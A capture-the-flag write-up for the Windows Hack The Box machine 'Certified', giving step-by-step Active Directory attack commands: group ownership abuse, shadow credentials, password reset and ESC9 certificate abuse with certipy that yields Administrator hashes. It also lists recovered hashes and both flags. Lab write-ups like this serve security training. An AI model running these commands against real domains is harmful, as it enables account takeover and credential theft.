Box Info
  • Name:Certified
  • OS: Windows
  • Difficulty: Medium
  • IP: 10.10.11.41
Certified box image

Setup

mkdir -p ~/ctf/HackTheBox/certified/scans; cd ~/ctf/HackTheBox/certified

IP Address: 10.10.11.41

echo "10.10.11.41 certified.htb" | sudo tee -a /etc/hosts

10.10.11.41 certified.htb


As this is a Assumed Breach scenario Box, we are given the following credentials to start with:

judith.mader:judith09

Enumeration

nmap -sC -sV -Pn -p- certified.htb -oN scans/nmap -vv

nmap -sC -sV -p- -T5 -vv --min-rate 2500 -oN scans/nmap_2 certified.htb

# nmap findings
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49689/tcp open  unknown          syn-ack ttl 127
49690/tcp open  unknown          syn-ack ttl 127
49691/tcp open  unknown          syn-ack ttl 127
49720/tcp open  unknown          syn-ack ttl 127
49729/tcp open  unknown          syn-ack ttl 127

now using Netexec and the provided credentials, we enumerate ldap(port 389) and smb(port 445).

Shares: Pasted_image_20250811165356.png

Users:

Administrator
Guest
krbtgt
judith.mader
management_svc
ca_operator
alexander.huges
harry.wilson
gregory.cameron

Using LDAP enumeration, we find that the user management_svc is Kerberoastable: Pasted_image_20250811170204.png

Using Hashcat we try to crack this password .\hashcat.exe -m 13100 .\hash.txt .\rockyou.txt but were unsuccessfull.

Using nxc ldap 10.10.11.41 -d certified.htb -u judith.mader -p judith09 --dns-server 10.10.11.41 --bloodhound -c All we get a bloodhound zip file to enumerate further.

using Bloodhound we find that we can traverse to ca_operator using the below path: Pasted_image_20250811172036.png

Setting Managment group’s owner to Judith

Using the bloodyAD tool we set the owner to judith: bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p judith09 set owner Management judith.mader Pasted_image_20250811172835.png

Using the below command we give judith genericAll rights to Management group so that we can add judith to the group bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p judith09 add genericAll Management judith.mader

Now we add judith user to Managment so that we can also have GenericWrite rights on Managment_SVC User.

bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p judith09 add groupMember Management judith.mader

Pasted_image_20250811173502.png

GenericWrite on Management_SVC

to exploit this we have to use PyWhiskers to exploit Shadow Credentials.

./pywhisker -d certified.htb -u judith.mader -p judith09 --target management_svc --action add --filename mgmt_svc

Pasted_image_20250811185214.png

python3 PKINITtools/gettgtpkinit.py -cert-pfx venv/bin/mgmt_svc.pfx -pfx-pass xXGg4pFUaqdvN04gqYuF certified.htb/management_svc management_svc.ccache

Pasted_image_20250811185334.png

python3 PKINITtools/getnthash.py -key 1ff1c8b4ea8d572eb1f773b5481a026a23e10b2a724caeb889ee398319724525 certified.htb/management_svc

Pasted_image_20250811185514.png

From the above shadow attack we get the NT hash for management_svc user

management_svc:a091c1832bcdd4677c28b5a6a1295584

Using Netexec we verify this is the correct hash

Pasted_image_20250811185859.png

We have winrm on management_svc Pasted_image_20250812070559.png

Pasted_image_20250812070838.png


User Flag

Location: C:\Users\management_svc\Desktop | Flag: b4f932ca96fde437b29e2b73dd312357

Privilege Escalation

GenericAll rights on CA_Operator

using bloodyAD --host 10.10.11.41 -d certified.htb -u management_svc -p :a091c1832bcdd4677c28b5a6a1295584 set password ca_operator Password@1! we change the password for ca_operator account as we have the genericall rights on management_svc.

Pasted_image_20250812064530.png

Certipy

Using certipy find -u ca_operator@certified.htb -p 'Password@1!' -dc-ip 10.10.11.41 -vulnerable -text -enabled we find that ‘CertifiedAuthentication’ Template is vulnerable to ESC9 - Template has no security extension.

Since we have GenericAll from Management_SVC-> CA_operator

Using certipy account update -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator, we spoof the upn for ca_operator

Pasted_image_20250812071915.png

Using certipy req -username ca_operator@certified.htb -hashes dbf36575210cc5a38ab4050cc6a2e9aa -ca certified-DC01-CA -template CertifiedAuthentication we request the certificate, Since this template disables security checks and trusts the UPN field.

Pasted_image_20250812071848.png

Using the obtained certificate we authenticate and get the NT hash using certipy auth -dc-ip '10.10.11.41' -pfx 'administrator.pfx' -username 'administrator' -domain 'certified.htb'

Pasted_image_20250812072245.png

administrator:0d5b49608bbce1751f708748f67e2d34

Now we revert the upn for ca_operator back to original

Pasted_image_20250812072344.png

We verify the access using nxc and evil-winrm:

Pasted_image_20250812072547.png


Root Flag

Location: C:\Users\Administrator\Desktop | Flag: a5404d7db96e03dfa194c6ba6c04dffb